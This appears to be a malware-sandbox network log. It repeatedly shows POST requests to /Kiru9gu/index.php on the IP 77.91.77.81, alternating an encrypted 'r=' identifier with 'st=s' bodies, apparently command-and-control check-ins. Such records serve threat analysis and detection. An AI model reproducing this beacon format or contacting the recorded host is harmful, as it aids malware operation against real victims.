Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
